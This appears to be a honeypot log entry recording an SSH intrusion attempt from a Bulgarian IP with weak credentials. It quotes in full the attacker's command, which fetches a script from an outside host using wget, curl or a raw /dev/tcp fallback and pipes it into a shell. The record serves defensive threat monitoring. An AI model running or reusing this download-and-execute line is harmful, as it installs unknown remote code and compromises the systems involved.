Time | 2024/11/21, 02:30:00 (GMT) |
Transaction ID | CVXX71QRNTIXS9B4 |
Service | ssh |
Location | BG (Bulgaria) |
Attacker | 87.120.113.231 |
Classification | Web script execution |
Harm Potential | High |
87.120.113.231 client username 'cxc' and password 'cxc' entered 87.120.113.231 client command : 'uname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"; SC=$(wget -O- http://94.156.177.109/sh || curl http://94.156.177.109/sh); if [ $? -ne 0 ]; then exec 3<>"/dev/tcp/94.156.177.109/80"; echo -e "GET /sh HTTP/1.0\r\nHost: 94.156.177.109\r\n\r\n" >&3; (while read -r line; do [ "$line" = $'\r' ] && break; done && cat) <&3 | sh -s ssh; exec 3>&-; else echo "$SC" | sh -s ssh; fi'
All observations are coming from honeypot central database.
Please share your wishes, opinions and suggestions with us: Honeypots.tk Admin |
If you like, you can support |